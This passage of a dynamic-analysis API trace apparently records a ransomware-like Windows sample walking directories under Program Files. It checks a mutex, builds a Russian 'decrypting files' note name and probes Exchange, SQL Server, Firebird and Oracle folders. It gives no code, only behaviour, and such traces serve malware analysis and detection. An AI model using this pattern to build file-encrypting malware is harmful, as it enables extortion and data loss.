ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.306] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0104.306] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.306] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: 
lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.306] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.306] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.306] GlobalUnlock (hMem=0x45000c) returned 0 [0104.306] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.306] GlobalLock (hMem=0x450004) returned 0x591988 [0104.306] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.307] GlobalUnlock (hMem=0x45000c) returned 0 [0104.307] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.307] GlobalUnlock (hMem=0x450004) returned 0 [0104.307] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.309] CharLowerBuffW (in: lpsz="MSADDNDR.DLL", cchLength=0xc | out: lpsz="msaddndr.dll") returned 0xc [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rð\x18", 
lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="að\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0a4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 
36 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", cchWideChar=51, lpMultiByteStr=0x18e080, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpUsedDefaultChar=0x0) returned 51 [0104.310] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0a4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllSADDNDR.DLL", lpUsedDefaultChar=0x0) returned 4 [0104.310] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0104.310] GetLastError () returned 0x12 [0104.310] FindClose (in: hFindFile=0x5733f0 | out: hFindFile=0x5733f0) returned 1 [0104.310] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.310] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.310] GlobalUnlock (hMem=0x450004) returned 0 [0104.310] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.310] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.310] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.310] GlobalUnlock (hMem=0x450004) returned 0 [0104.310] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.310] GlobalUnlock (hMem=0x45000c) returned 0 [0104.310] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x18f1e4 | out: 
lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5733f0 [0104.311] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.311] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.311] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.311] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.311] GlobalUnlock (hMem=0x45000c) returned 0 [0104.311] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.311] GlobalLock (hMem=0x450004) returned 0x591988 [0104.311] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.311] GlobalUnlock (hMem=0x45000c) returned 0 [0104.311] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.311] GlobalUnlock (hMem=0x450004) returned 0 [0104.311] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.311] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.311] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.311] 
FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.311] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.311] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.311] GlobalUnlock (hMem=0x450004) returned 0 [0104.311] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.312] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.312] GlobalUnlock (hMem=0x450004) returned 0 [0104.312] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.312] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0104.312] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.312] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.312] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.312] GlobalLock (hMem=0x450004) returned 0x591988 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] GlobalHandle (pMem=0x591988) 
returned 0x450004 [0104.312] GlobalUnlock (hMem=0x450004) returned 0 [0104.312] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.312] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0104.312] GetLastError () returned 0x12 [0104.313] FindClose (in: hFindFile=0x5733f0 | out: hFindFile=0x5733f0) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15e5ff70, ftCreationTime.dwHighDateTime=0x1d55fbd, ftLastAccessTime.dwLowDateTime=0x2d722770, ftLastAccessTime.dwHighDateTime=0x1d5af2e, ftLastWriteTime.dwLowDateTime=0x2d722770, ftLastWriteTime.dwHighDateTime=0x1d5af2e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashfxp.exe", cAlternateFileName="")) returned 1 [0104.313] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.313] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.313] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.313] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.313] GlobalUnlock (hMem=0x450004) returned 0 [0104.313] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.313] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.313] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.313] 
GlobalUnlock (hMem=0x450004) returned 0 [0104.313] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.313] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.314] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0104.314] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.314] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.314] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.314] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.314] GlobalLock (hMem=0x450004) returned 0x591988 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.314] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.314] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.314] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.314] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.314] GlobalLock (hMem=0x45000c) returned 0x591988 
[0104.314] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.315] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.315] SysReAllocStringLen (in: pbstr=0x18f444*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared", len=0x2e | out: pbstr=0x18f444*="C:\\Program Files\\Common Files\\Microsoft Shared") returned 1 [0104.315] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.315] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.315] GlobalLock (hMem=0x450004) returned 0x591988 [0104.315] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.315] GlobalUnlock (hMem=0x450004) returned 0 [0104.315] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft\\Exchange Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="䱈@㐖W㏪W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.315] GetLastError () returned 0x3 [0104.315] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, 
cbMultiByte=26, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0104.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft SQL Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㽜V\x181")) returned 0xffffffff [0104.316] GetLastError () returned 0x2 [0104.316] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0104.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Firebird", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@丬W企@\x18㟬X\x18;")) returned 0xffffffff [0104.317] GetLastError () returned 0x2 [0104.317] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0104.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSSQL.1", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟄X\x18D")) returned 0xffffffff [0104.317] GetLastError () returned 0x2 [0104.317] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0104.318] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@丬W企@\x18䄴X\x18j")) returned 0xffffffff [0104.318] GetLastError () returned 0x2 [0104.318] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.318] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.318] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Adobe", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, 
ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@佼W企@\x18㟬X\x18q")) returned 0xffffffff [0104.319] GetLastError () returned 0x2 [0104.319] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="adobe\\䄰X`") returned 6 [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.319] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Oracle", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟄X\x18y")) returned 0xffffffff [0104.319] GetLastError () returned 0x2 [0104.319] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, 
